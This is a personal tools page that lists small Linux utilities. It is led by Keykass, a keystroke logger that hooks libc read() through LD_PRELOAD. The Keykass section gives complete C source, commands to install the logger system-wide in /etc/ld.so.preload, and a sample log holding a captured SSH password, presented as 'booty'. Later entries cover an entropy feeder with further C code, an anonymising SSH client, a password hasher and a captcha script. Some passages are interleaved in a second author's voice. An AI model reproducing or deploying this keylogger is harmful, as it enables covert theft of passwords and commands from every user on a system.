Tools
Keykass.so: Dynamic library for keystroke logging
Some articles about function interposition and syscall hooking inspired me to write this small library. Once it is loaded into a process (a bash shell, for instance), it wraps the libc read() function and appends every byte read from the terminal to a world-readable file. The library defines its own read() with the same prototype as libc's, so the dynamic linker resolves the process's read() calls to this fake function; the fake obtains a pointer to the genuine libc read() with dlsym() (using the RTLD_NEXT handle, so the lookup skips the interposer itself), calls it, logs the bytes it returned and hands the result back to the caller unchanged.
- Keykass 1.0 (download, view source)
The usual system calls on a Bash process when the "ls" command is typed:
$ strace -e read,write,open,close /bin/bash
[...]
read(0, "l"..., 1) = 1
write(2, "l"..., 1) = 1
read(0, "s"..., 1) = 1
write(2, "s"..., 1) = 1
The system calls on the same action while keykass.so is loaded:
read(0, "l"..., 1) = 1
open("/tmp/.bob.3845", [...], 0777) = 3
write(3, "l"..., 1) = 1
close(3) = 0
write(2, "l"..., 1) = 1
read(0, "s"..., 1) = 1
open("/tmp/.bob.3845", [...], 0777) = 3
write(3, "s"..., 1) = 1
close(3) = 0
write(2, "s"..., 1) = 1
Once the library is installed (see below), every new dynamically linked process on the system loads it, so just wait for new shells to be opened...
# gcc -shared -fPIC -o /path/to/keykass.so keykass.c -ldl
# echo "/path/to/keykass.so" > /etc/ld.so.preload
... and you'll get your booty:
$ cat /tmp/.bob.*
ls /et<TAB>/etc
ssh -4x private.server.com
SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
St0ngPaSSw0rD!
hostname
w
exit
NOTE: In this example, some lines (such as "SSH-2.0-OpenSSH[...]") were not typed by our user: they were logged because other processes (here the ssh client, reading the server banner from its socket) also go through our fake read(). Everything a preloaded process reads on file descriptor 0 ends up in the log, whether or not it came from a keyboard.
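The mechanism described above, as an added illustration (my own code, not the keykass source): a minimal interposer that defines read() with libc's prototype, fetches the genuine function through dlsym(RTLD_NEXT, "read") and appends whatever is read from file descriptor 0 to a file under /tmp. The log path /tmp/.keykass.<pid> and the function names are my own choices; mode 0644 keeps the file world-readable as in the original (which used 0777). The logger saves and restores errno and never calls read() itself, so it cannot recurse or change what the victim process observes.

```c
#define _GNU_SOURCE          /* for RTLD_NEXT in <dlfcn.h> */
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef RTLD_NEXT            /* glibc/musl value, in case the feature macro came too late */
#define RTLD_NEXT ((void *) -1l)
#endif

typedef ssize_t (*read_fn)(int, void *, size_t);
static read_fn real_read;    /* genuine libc read(), resolved on first use */

/* Hypothetical log location, one file per logged process (cf. /tmp/.bob.<pid>). */
const char *keykass_log_path(char *out, size_t len)
{
    snprintf(out, len, "/tmp/.keykass.%ld", (long)getpid());
    return out;
}

/* Append n bytes to the log file. 0644 leaves it world-readable so an
   unprivileged account can collect what a root shell typed. The caller's
   errno is preserved, and nothing here calls read(), so there is no recursion. */
ssize_t keykass_append(const void *buf, size_t n)
{
    char path[64];
    int saved_errno = errno;
    int fd = open(keykass_log_path(path, sizeof path),
                  O_WRONLY | O_CREAT | O_APPEND, 0644);
    ssize_t w = -1;
    if (fd >= 0) {
        w = write(fd, buf, n);
        close(fd);
    }
    errno = saved_errno;
    return w;
}

/* Interposed read(): same name and prototype as libc's, so once this object
   is preloaded every read() call in the process lands here first. */
ssize_t read(int fd, void *buf, size_t count)
{
    if (!real_read) {
        /* RTLD_NEXT skips this object and finds the next definition: libc's. */
        real_read = (read_fn)dlsym(RTLD_NEXT, "read");
        if (!real_read) {
            errno = ENOSYS;
            return -1;
        }
    }
    ssize_t n = real_read(fd, buf, count);
    /* Log only data actually returned from fd 0: keystrokes in an interactive
       shell, but also anything else the process happens to read there. */
    if (fd == 0 && n > 0)
        keykass_append(buf, (size_t)n);
    return n;
}
```

Build it as a shared object (gcc -shared -fPIC -o keykass_demo.so demo.c -ldl) and load it with LD_PRELOAD=./keykass_demo.so bash for a single shell, or through /etc/ld.so.preload for every process, as the original does.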
Give us Chaos*!
Entropy is difficult to obtain on remote servers, as it is mostly collected from hardware noise, in particular mouse movements and keyboard timings, and servers usually have no such devices connected. The following piece of code retrieves random blocks of bytes from the Random.org website, transforms them with a "polynumeric" substitution cipher and feeds them into the system's random device, /dev/random, until the entropy pool is full. This can be used when /dev/random runs out of entropy during cryptographic key generation. Two caveats: the bytes are fetched over the network from a third party, so they are known to Random.org and to anyone able to observe the connection, and the local substitution does not change that; treat the result as a way to unblock /dev/random rather than as secret entropy for keys that must resist a well-placed attacker. Also, simply writing to /dev/random mixes data into the pool without crediting it; the kernel's entropy estimate (the status counter below) only rises through the RNDADDENTROPY ioctl, which requires root.
- GUChaos 1.0 (download, view source)
# ./GUChaos
[+] GUChaos version 1.0
[+] Retrieve random bytes from http://random.org
[+] Adding 0x45558062 0x4ed6f80d ... 0xbce8af9b (status: 422/4096)
[+] Adding 0xfb8e9d76 0x214a0857 ... 0x2993012c (status: 678/4096)
[+] Adding 0xf2789051 0x4bf38816 ... 0xc49f2319 (status: 934/4096)
[...]
[+] Adding 0x725ebd88 0x89416b33 ... 0x90e2dcb4 (status: 4019/4096)
[+] Adding 0x70bd30b6 0x6d87a158 ... 0x8f669921 (status: 4096/4096)
[+] available entropy is set to the maximum (4096)
* = Entropy can be associated with chaos, disorder, etc.
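The kernel side of what GUChaos does, as an added example (my own code, not GUChaos): credit bytes to the pool with the RNDADDENTROPY ioctl, which both mixes the data in and raises entropy_avail, and repeat until the 4096-bit target is reached. The bytes to credit are read from stdin so that the operator chooses the source (the example fetches nothing from the network); the constants, function names and the 256-byte chunk size are my assumptions. The ioctl and struct rand_pool_info come from <linux/random.h>, and the ioctl needs root (CAP_SYS_ADMIN). Note that since Linux 5.6 /dev/random no longer blocks once the generator has been initialised, so the counter matters mostly on older kernels like the one in the output above.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/random.h>      /* RNDADDENTROPY, struct rand_pool_info */

#define POOL_TARGET_BITS 4096  /* the 4096 reported by GUChaos: the old kernels' pool size */
#define CHUNK 256              /* assumed chunk size per ioctl */

/* Parse the text of /proc/sys/kernel/random/entropy_avail; -1 if it is not a number. */
int parse_entropy_avail(const char *text)
{
    char *end;
    long v = strtol(text, &end, 10);
    if (end == text || v < 0) return -1;
    return (int)v;
}

/* Current kernel entropy estimate in bits, or -1 if unreadable. */
int entropy_avail(void)
{
    char buf[32] = {0};
    FILE *f = fopen("/proc/sys/kernel/random/entropy_avail", "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_entropy_avail(buf);
}

/* How many bytes (credited at 8 bits each) lift `avail` up to `target`. */
size_t bytes_for_target(int avail, int target)
{
    if (avail >= target) return 0;
    return ((size_t)(target - avail) + 7) / 8;
}

/* Build the ioctl argument: entropy_count is in bits, buf_size in bytes, and
   buf is a __u32 array, so the allocation is rounded up to whole words.
   The caller frees the result. */
struct rand_pool_info *make_pool_info(const unsigned char *data, size_t len)
{
    size_t words = (len + 3) / 4;
    struct rand_pool_info *info = calloc(1, sizeof *info + words * 4);
    if (!info) return NULL;
    info->entropy_count = (int)(len * 8); /* full credit: only honest for secret, uniform bytes */
    info->buf_size = (int)len;
    memcpy(info->buf, data, len);
    return info;
}

/* Mix `data` into the pool and credit it. Needs CAP_SYS_ADMIN; 0 on success, -1 on error. */
int add_entropy(int random_fd, const unsigned char *data, size_t len)
{
    struct rand_pool_info *info = make_pool_info(data, len);
    if (!info) return -1;
    int r = ioctl(random_fd, RNDADDENTROPY, info);
    free(info);
    return r < 0 ? -1 : 0;
}

int main(void)
{
    int fd = open("/dev/random", O_WRONLY);
    if (fd < 0) { perror("open /dev/random"); return 1; }
    int avail;
    while ((avail = entropy_avail()) >= 0 && avail < POOL_TARGET_BITS) {
        unsigned char chunk[CHUNK];
        size_t want = bytes_for_target(avail, POOL_TARGET_BITS);
        if (want > sizeof chunk) want = sizeof chunk;
        size_t got = fread(chunk, 1, want, stdin);      /* source chosen by the operator */
        if (got == 0) { fprintf(stderr, "input exhausted at %d/%d\n", avail, POOL_TARGET_BITS); break; }
        if (add_entropy(fd, chunk, got) < 0) { perror("RNDADDENTROPY"); break; }
        printf("[+] added %zu bytes (status: %d/%d)\n", got, entropy_avail(), POOL_TARGET_BITS);
    }
    close(fd);
    return 0;
}
```

Run it as root with the byte source on stdin, for example head -c 4096 /dev/hwrng | ./addentropy on a machine with a hardware generator; whatever is piped in is credited at one bit per bit, so the source must really be secret and uniform, which is the part a remote web service cannot guarantee.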
Assh: The Anonymous Secure SHell
Assh, the Anonymous Secure SHell client, is an SSH client for GNU/Linux and Mac OS X that establishes its connections through free public SSL proxies, so the destination server sees the proxy's address rather than the client's (the proxy operator, of course, still sees that the connection took place, though not its content). This tool was included in various pen-test distributions such as nUbuntu.
- Assh 2.3 (tar.gz, hosted by Sourceforge.net)
- Assh 2.2 (tar.gz, hosted by Sourceforge.net)
Pwd-hash: Get the hash of a given password
Pwd-hash is a password hashing tool that uses the crypt(3) function to generate the hash of a string given on standard input. Different hashing schemes are available for the password (DES, MD5, SHA). Note that the traditional DES scheme only looks at the first eight characters of the password; prefer the SHA-based scheme wherever the target system supports it.
$ ./pwd-hash --help
Usage: ./pwd-hash <option>
Display the password hash of a string given on stdin.
Options are:
  --des            Traditional DES-based scheme
  --md5            MD5-based scheme (this is the default)
  --grub           MD5-based scheme with a 6 bytes salt (as used in GRUB)
  --sha            SHA-based scheme (SHA-512), libc version >= 2.7
  --salt <string>  Specify a salt instead of random string
  -n, --noecho     Do not echo input characters
  -h, --help       Display this help
  -v, --version    Display version
Examples:
  $ echo "P4ssw0rD" | pwd-hash --md5
  $ pwd-hash --des <<<"P4ssw0rD"
  $ pwd-hash --noecho --sha
  $ pwd-hash --salt "abcdefgh" --md5
Report bugs to <vladz@devzero.fr>.
CGI-Captcha: Protect your HTML forms against spam
A small CAPTCHA tool that protects your HTML forms against spam. It is a CGI script that generates the challenge image with ImageMagick's 'convert' tool.